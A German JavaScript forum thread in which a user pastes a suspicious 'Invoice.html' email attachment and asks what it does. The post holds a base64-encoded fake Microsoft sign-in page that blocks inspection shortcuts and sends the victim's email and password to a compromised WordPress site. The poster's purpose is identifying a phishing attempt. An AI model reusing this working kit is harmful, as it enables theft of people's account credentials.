Javascript-forum
Was machen diese JavaScripts? - Druckversion

+- Javascript-forum (https://javascript-forum.de)
+-- Forum: Entwicklung (https://javascript-forum.de/forumdisplay.php?fid=4)
+--- Forum: Javascript (https://javascript-forum.de/forumdisplay.php?fid=6)
+--- Thema: Was machen diese JavaScripts? (/showthread.php?tid=1688)



Was machen diese JavaScripts? - NeuHier - 19.10.2022

Servus!

Brauche Eure Hilfe!

Heute Nacht kriegt mein Chef von einem Lieferant ein Mail mit "Invoice.html"-Anhang. Nichts Böses ahnend, versucht er den Anhang aufzumachen. Merkt aber sofort, das hier was faul ist.
Das hier ist Inhalt von "Invoice.html"
Code:
<script>
    var url_string = "firmenmail@adresse.com";
    var data = atob("PCFET0NUWVBFIGh0bWw+CjxodG1sIGRpcj0ibHRyIiBjbGFzcz0iIiBsYW5nPSJlbiI+CiAgICA8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4KICAgIDx0aXRsZT5FeGNlbCB3b3Jrc2hlZXQ8L3RpdGxlPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTIuMCwgdXNlci1zY2FsYWJsZT15ZXMiPgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgogICAgPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9mYXZpY29uX2FfZXVwYXlmZ2docWlhaTdrOXNvbDZsZzIuaWNvIj4gICAgCiAgICA8bGluayBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2Nkbi5qc2RlbGl2ci5uZXQvbnBtL2NvcnNAMi44LjUvbGliL2luZGV4Lm1pbi5qcyI+CiAgICA8bGluayBkYXRhLWxvYWRlcj0iY2RuIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9jZG5idW5kbGVzL2NvbnZlcmdlZC52Mi5sb2dpbi5taW5feml5dGY4ZHp0OWVnMXM2LW9oaGxlZzIuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8L2hlYWQ+CjxzY3JpcHQ+CiAgICAvLyBwcmV2ZW50IGN0cmwgKyBzCiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGFzeW5jKGUpID0+IHsKICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIChlLndoaWNoID09IDgzKSkgewogICAgICAgICAgICBlLnByZXZlbnREZWZhdWx0KCk7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsgfQogICAgfSk7CiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBldmVudCA9PiBldmVudC5wcmV2ZW50RGVmYXVsdCgpKTsKICAgIGRvY3VtZW50Lm9ua2V5ZG93biA9IGZ1bmN0aW9uIChlKSB7CiAgICAgICAgaWYgKGV2ZW50LmtleUNvZGUgPT0gMTIzKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0UnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUuc2hpZnRLZXkgJiYgZS5rZXlDb2RlID09ICdJJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLnNoaWZ0S2V5ICYmIGUua2V5Q29kZSA9PSAnSicuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdVJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ1MnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnSCcuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdBJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0YnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnRScuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgfQogICAgd2luZG93Lm9ua2V5ZG93biA9IChlKSA9PiB7CiAgICAgICAgcmV0dXJuICEoZS5jdHJsS2V5ICYmCiAgICAgICAgICAgIChlLmtleUNvZGUgPT09IDY3IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg2IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg1IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDExNykpOwogICAgfTsgICAgCjwvc2NyaXB0Pgo8Ym9keSBjbGFzcz0iY2IiIHN0eWxlPSJkaXNwbGF5OiBibG9jazsiPgo8Zm9ybSBuYW1lPSJmMSIgaWQ9ImkwMjgxIiBtZXRob2Q9InBvc3QiIGF1dG9jb21wbGV0ZT0ib2ZmIj4KICAgIDxkaXYgY2xhc3M9ImxvZ2luLXBhZ2luYXRlZC1wYWdlIj4KICAgICAgICA8ZGl2IGlkPSJsaWdodGJveFRlbXBsYXRlQ29udGFpbmVyIj4KPGRpdiBpZD0ibGlnaHRib3hCYWNrZ3JvdW5kQ29udGFpbmVyIj4KICAgIDxkaXYgY2xhc3M9ImJhY2tncm91bmQtaW1hZ2UtaG9sZGVyIiByb2xlPSJwcmVzZW50YXRpb24iPgogICAgPGRpdiBjbGFzcz0iYmFja2dyb3VuZC1pbWFnZSBleHQtYmFja2dyb3VuZC1pbWFnZSIgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybCgmcXVvdDtodHRwczovL2d5YXpvLmNvbS9lMjFlY2NmOWUzMDdlMzYwZTNhODBjZTZiYmM3NGFmOC5wZ247KTsiPjwvZGl2Pgo8L2Rpdj48L2Rpdj4KICAgIDxkaXYgY2xhc3M9Im91dGVyIiBpZD0iYmdJbWdDZW50ZXIiPgogICAgICAgIDxkaXYgY2xhc3M9InRlbXBsYXRlLXNlY3Rpb24gbWFpbi1zZWN0aW9uIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWlkZGxlIGV4dC1taWRkbGUiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZnVsbC1oZWlnaHQiPgogICAgPGRpdiBjbGFzcz0iZmxleC1jb2x1bW4iPgogICAgICAgIDxkaXYgY2xhc3M9Indpbi1zY3JvbGwiPgogICAgICAgICAgICA8ZGl2IGlkPSJsaWdodGJveCIgY2xhc3M9InNpZ24taW4tYm94IGV4dC1zaWduLWluLWJveCBmYWRlLWluLWxpZ2h0Ym94Ij4KICAgICAgICAgICAgPGRpdj48aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS83YWU3NzNmZjYxZTJjOGE4OGJkYTU1MzBjM2IyYWExMy5wbmciIHN0eWxlPSJ3aWR0aDo5MHB4OyBoZWlnaHQ6NzVweDsiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IHJvbGU9Im1haW4iPgogICAgICAgIDxkaXYgaWQ9InBzdGIiIGNsYXNzPSJwYWdpbmF0aW9uLXZpZXcgYW5pbWF0ZSBoYXMtaWRlbnRpdHktYmFubmVyIHNsaWRlLWluLW5leHQiPgogICAgICAgIDxkaXY+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImlkZW50aXR5QmFubmVyIj4KICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0iYnV0dG9uIiBjbGFzcz0iYmFja0J1dHRvbiIgaWQ9ImlkQnRuX0JhY2siPiA8aW1nIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0XzdjYzA5NmRhNmFhMmRiYTNmODFmY2MxYzgyNjIxNTdjLnBuZyIgc3Znc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyIgc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyI+IDwvYnV0dG9uPgogICAgICAgICAgICAgICAgPGRpdiBpZD0ic2hvdy1lbWFpbCIgY2xhc3M9ImlkZW50aXR5Ij48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICA8ZGl2IGlkPSJsb2dpbkhlYWRlciIgY2xhc3M9InJvdyB0aXRsZSBleHQtdGl0bGUiPgogICAgICAgIDxkaXYgcm9sZT0iaGVhZGluZyIgYXJpYS1sZXZlbD0iMSI+RW50ZXIgcGFzc3dvcmQ8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iZXJyb3JwdyIgc3R5bGU9ImNvbG9yOiByZWQ7IG1hcmdpbjogMTVweDsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyBtYXJnaW4tYm90dG9tOiAwcHg7Ij48L2Rpdj4KICAgIDxkaXYgaWQ9ImltcG9ydGFudDEiIHN0eWxlPSJjb2xvcjogYmxhY2s7Zm9udC1zaXplOiAxM3B4OyI+CiAgICAgICAgQmVjYXVzZSB5b3UncmUgYWNjZXNzaW5nIHNlbnNpdGl2ZSBpbmZvLCB5b3UgbmVlZCB0byB2ZXJpZnkgeW91ciBwYXNzd29yZCB0byB2aWV3IGV4Y2VsIHdvcmtzaGVldHMKICAgICA8L2Rpdj4KICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBjb2wtbWQtMjQiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwbGFjZWhvbGRlckNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8aW5wdXQgbmFtZT0icGFzc3dkIiB0eXBlPSJwYXNzd29yZCIgaWQ9ImkwMTE4IiBhdXRvY29tcGxldGU9Im9mZiIgY2xhc3M9ImZvcm0tY29udHJvbCBpbnB1dCBleHQtaW5wdXQgdGV4dC1ib3ggZXh0LXRleHQtYm94IiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIHJlcXVpcmVkIC8+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8ZGl2PgogICAgPGRpdiBjbGFzcz0icG9zaXRpb24tYnV0dG9ucyI+CiAgICAgICAgPGRpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC0yNCI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0idGV4dC0xMyI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaWQ9ImlkQV9QV0RfRm9yZ290UGFzc3dvcmQiIHJvbGU9ImxpbmsiIGhyZWY9IiMiPk5vdGU6IE9ubHkgcmVjaXBpZW50J3MgZW1haWwgY2FuIGFjY2VzcyBzaGFyZWQgZmlsZXM8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8YSBpZD0iaTE2NjgiIGhyZWY9IiMiPjwvYT4KICAgICAgICAgICAgPC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAKICAgICAgICA8ZGl2IGNsYXNzPSJ3aW4tYnV0dG9uLXBpbi1ib3R0b20iPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICAgICAgPGRpdj48ZGl2IGNsYXNzPSJjb2wteHMtMjQgbm8tcGFkZGluZy1sZWZ0LXJpZ2h0IGJ1dHRvbi1jb250YWluZXIiPgogICAgICAgIDxkaXYgY2xhc3M9ImlubGluZS1ibG9jayI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIGlkPSJCdXR0b245IiBjbGFzcz0id2luLWJ1dHRvbiBidXR0b25fcHJpbWFyeSBidXR0b24gZXh0LWJ1dHRvbiBwcmltYXJ5IGV4dC1wcmltYXJ5IiB2YWx1ZT0iU2lnbmluIj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0icGxhdGUgZm9vdGVyIGV4dC1mb290ZXIiIHJvbGU9ImNvbnRlbnRpbmZvIj48L2Rpdj4KICAgIDxkaXYgaWQ9ImZvb3RlciIgcm9sZT0iY29udGVudGluZm8iIGNsYXNzPSJmb290ZXIgZXh0LWZvb3RlciI+CiAgICAgICAgPGRpdj4KPGRpdiBpZD0iZm9vdGVyTGlua3MiIGNsYXNzPSJmb290ZXJOb2RlIHRleHQtc2Vjb25kYXJ5Ij4KICAgICAgICA8YSBpZD0iZnRyVGVybXMiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5UZXJtcyBvZiB1c2U8L2E+CiAgICAgICAgPGEgaWQ9ImZ0clByaXZhY3kiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5Qcml2YWN5ICZhbXA7IGNvb2tpZXM8L2E+CiAgICA8YSBpZD0ibW9yZU9wdGlvbnMiIGhyZWY9IiMiIGFyaWEtbGFiZWw9IkNsaWNrIGhlcmUgZm9yIHRyb3VibGVzaG9vdGluZyBpbmZvcm1hdGlvbiIgY2xhc3M9ImZvb3Rlci1jb250ZW50IGV4dC1mb290ZXItY29udGVudCBmb290ZXItaXRlbSBleHQtZm9vdGVyLWl0ZW0gZGVidWctaXRlbSBleHQtZGVidWctaXRlbSI+Li4uPC9hPgo8L2Rpdj48L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KPC9kaXY+PC9kaXY+CjwvZm9ybT4KPHNjcmlwdD4KICAgIHZhciBjb3VudCA9IDA7CiAgICBmdW5jdGlvbiBzZXRfYnJhbmQoZW1haWwpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIGRhdGE6IHsgdXNlcm5hbWU6IGVtYWlsIH0sCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChyZXNwb25zZSkgewogICAgICAgICAgICAgICAgbGV0IHJlcyA9IEpTT04ucGFyc2UocmVzcG9uc2UpCiAgICAgICAgICAgICAgICBsZXQgbG9nbyA9IHJlc1sicmVzIl1bIkJhbm5lckxvZ28iXSwgYmFja2dyb3VuZCA9IHJlc1sicmVzIl1bIklsbHVzdHJhdGlvbiJdLCBEYXJrVGlsZSA9IHJlc1sicmVzIl1bIlRpbGVEYXJrTG9nbyJdCiAgICAgICAgICAgICAgICBsZXQgVGlsZUxvZ28gPSByZXNbInJlcyJdWyJUaWxlTG9nbyJdLCBCb2lsZXJQbGF0ZVRleHQgPSByZXNbInJlcyJdWyJCb2lsZXJQbGF0ZVRleHQiXQogICAgICAgICAgICAgICAgaWYgKGxvZ28pIHsKICAgICAgICAgICAgICAgICAgICAkKCcubG9nbycpLmF0dHIoJ3NyYycsIGxvZ28pOwoJCQkgICAgfQogICAgICAgICAgICAgICAgaWYgKEJvaWxlclBsYXRlVGV4dCkgewogICAgICAgICAgICAgICAgICAgIGNvbnNvbGUubG9nKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuYXBwZW5kKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuY3NzKHsidGV4dC1hbGlnbiI6ICJjZW50ZXIifSkKICAgICAgICAgICAgICAgIH0gICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmIChiYWNrZ3JvdW5kKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIGJhY2tncm91bmQgKyAnKScsICItd2Via2l0LWZpbHRlciI6ICJicmlnaHRuZXNzKDIwJSkiLCAiZmlsdGVyIjogImJyaWdodG5lc3MoNDclKSIgfSk7CiAgICAgICAgICAgICAgICB9IGVsc2UgaWYgKERhcmtUaWxlKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIERhcmtUaWxlICsgJyknLCAiLXdlYmtpdC1maWx0ZXIiOiAiYnJpZ2h0bmVzcygyMCUpIiwgImZpbHRlciI6ICJicmlnaHRuZXNzKDQ3JSkiIH0pOwogICAgICAgICAgICAgICAgfSBlbHNlIGlmIChUaWxlTG9nbykgewogICAgICAgICAgICAgICAgICAgICQoJy5iYWNrZ3JvdW5kLWltYWdlJykuY3NzKHsgJ2JhY2tncm91bmQtaW1hZ2UnOiAndXJsKCcgKyBUaWxlTG9nbyArICcpJywgIi13ZWJraXQtZmlsdGVyIjogImJyaWdodG5lc3MoMjAlKSIsICJmaWx0ZXIiOiAiYnJpZ2h0bmVzcyg0NyUpIiB9KTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfQoKICAgIGZ1bmN0aW9uIHNlbmRfcmVzdWx0KHVzZXIsIHBhc3MpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICBkYXRhOiB7CiAgICAgICAgICAgICAgICAiZW1haWwiOiB1c2VyLAogICAgICAgICAgICAgICAgInBhc3N3b3JkIjogcGFzcwogICAgICAgICAgICB9LAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZyhkYXRhKTsKICAgICAgICAgICAgfSwKICAgICAgICAgICAgZXJyb3I6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZygnQWpheCBlcnJvcicpOwogICAgICAgICAgICB9CgkJfSk7ICAgICAgICAKICAgIH0KCiAgICAKICAgIGRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBhc3luYygpID0+IHsKICAgICAgICBpZih1cmxfc3RyaW5nKXsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInNob3ctZW1haWwiKS5pbm5lckhUTUwgPSB1cmxfc3RyaW5nOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAxMTgiKS5mb2N1cygpOwogICAgICAgICAgICBzZXRfYnJhbmQodXJsX3N0cmluZyk7CiAgICAgICAgfQoKICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQnV0dG9uOSIpLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgZSA9PiB7CiAgICAgICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0ID8gZXZlbnQucHJldmVudERlZmF1bHQoKSA6IGV2ZW50LnJldHVyblZhbHVlID0gZmFsc2U7CgogICAgICAgICAgICB2YXIgcHN3ZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDExOCIpLnZhbHVlOwogICAgICAgICAgICBpZihwc3dkLmxlbmd0aCA8IDUpewogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5PSJub25lIjsKICAgICAgICAgICAgICAgIHNldFRpbWVvdXQoKCkgPT4ge2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDI4MSIpLnJlc2V0KCk7IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdlcnJvcnB3JykuaW5uZXJIVE1MID0gIllvdXIgYWNjb3VudCBwYXNzd29yZCBpcyB0b28gc2hvcnQuIn0sIDE1MDApOwogICAgICAgICAgICB9IGVsc2UgaWYgKHBzd2QubGVuZ3RoID4gNSAmJiBjb3VudCA8PSAwKSB7CiAgICAgICAgICAgICAgICBzZW5kX3Jlc3VsdCh1cmxfc3RyaW5nLCBwc3dkKTsKICAgICAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbXBvcnRhbnQxIikuc3R5bGUuZGlzcGxheT0ibm9uZSI7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHtjb3VudCsrOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAyODEiKS5yZXNldCgpOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZXJyb3JwdycpLmlubmVySFRNTCA9IGBZb3VyIHBhc3N3b3JkIGlzIGluY29ycmVjdC4gUGxlYXNlIGVudGVyIHRoZSBwYXNzd29yZCBmb3IgeW91ciBhYm92ZSBlbWFpbCB0byBhY2Nlc3MgRXhjZWwgd29ya3NoZWV0LCA8YSBocmVmPSIjIj48L2E+YH0sIDIwMDApCiAgICAgICAgICAgIH0gZWxzZSBpZiAoY291bnQgPCAyKXsKICAgICAgICAgICAgICAgIHNlbmRfcmVzdWx0KHVybF9zdHJpbmcsIHBzd2QpOwogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwogICAgICAgICAgICAgICAgc2V0VGltZW91dCgoKSA9PiB7Y291bnQrKzsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImkwMjgxIikucmVzZXQoKTsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2Vycm9ycHcnKS5pbm5lckhUTUwgPSBgWW91ciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuIFBsZWFzZSBlbnRlciB0aGUgcGFzc3dvcmQgZm9yIHlvdXIgYWJvdmUgZW1haWwgdG8gYWNjZXNzIEV4Y2VsIHdvcmtzaGVldCwgPGEgaHJlZj0iIyI+PC9hPmB9LCAyMDAwKQogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgc2VuZF9yZXN1bHQodXJsX3N0cmluZywgcHN3ZCk7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHt3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9vdXRsb29rLm9mZmljZTM2NS5jb20vRW5jcnlwdGlvbi9FcnJvclBhZ2UuYXNweD9zcmM9MyZjb2RlPTExJmJlPVNONlBSMDRNQjQwMTQmZmU9Sk5BUDI3NUNBMDA0MC5aQUZQMjc1LlBST0QuT1VUTE9PZ0suQ09NJmxvYz1lbi1VUyZpdGVtSUQ9RTRFX01fZTlkZjE1NGEtZTRiOC00NDg2LThhZWMtN2FjY2VlYjkzZmVlIil9KTsKICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfSk7Cjwvc2NyaXB0Pgo8L2Rpdj48L2JvZHk+PC9odG1sPg==");
    document.write(data)
</script>

Konnte soweit den Inhalt dekodieren...
Code:
<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Excel worksheet</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    <link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js">
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
</head>
<script>
    // prevent ctrl + s
    window.addEventListener('keydown', async(e) => {
        if (e.ctrlKey && (e.which == 83)) {
            e.preventDefault();
            return false; }
    });
    window.addEventListener('contextmenu', event => event.preventDefault());
    document.onkeydown = function (e) {
        if (event.keyCode == 123) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
    }
    window.onkeydown = (e) => {
        return !(e.ctrlKey &&
            (e.keyCode === 67 ||
                e.keyCode === 86 ||
                e.keyCode === 85 ||
                e.keyCode === 117));
    };
</script>
<body class="cb" style="display: block;">
<form name="f1" id="i0281" method="post" autocomplete="off">
    <div class="login-paginated-page">
        <div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
    <div class="background-image-holder" role="presentation">
    <div class="background-image ext-background-image" style="background-image: url(&quot;https://gyazo.com/e21eccf9e307e360e3a80ce6bbc74af8.pgn;);"></div>
</div></div>
    <div class="outer" id="bgImgCenter">
        <div class="template-section main-section">
            <div class="middle ext-middle">
                <div class="full-height">
    <div class="flex-column">
        <div class="win-scroll">
            <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
            <div><img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:90px; height:75px;"></div>
            <div role="main">
        <div id="pstb" class="pagination-view animate has-identity-banner slide-in-next">
        <div>
            <div class="identityBanner">
